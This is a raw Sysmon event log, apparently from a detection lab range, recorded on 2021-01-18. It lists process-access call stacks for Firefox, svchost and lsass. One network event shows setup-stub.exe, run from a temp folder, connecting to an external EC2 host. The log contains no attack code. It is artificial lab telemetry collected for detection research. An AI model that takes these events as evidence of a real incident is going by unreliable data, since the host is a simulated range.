13:59:58.724{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c26|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c5a73|C:\Program Files\Mozilla Firefox\xul.dll+197b04e 10341000x800000000000000016890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000016888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localUsermode2021-01-18 13:59:56.775{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-495.attackrange.local49207-false34.215.48.141ec2-34-215-48-141.us-west-2.compute.amazonaws.com80http 10341000x800000000000000016887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.147{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+f74b0e|C:\Program Files\Mozilla Firefox\xul.dll+1087037|C:\Program Files\Mozilla Firefox\xul.dll+11c4361|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+3b226|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.130{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.130{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.114{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.114{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.083{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9 10341000x800000000000000016881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.067{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.067{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 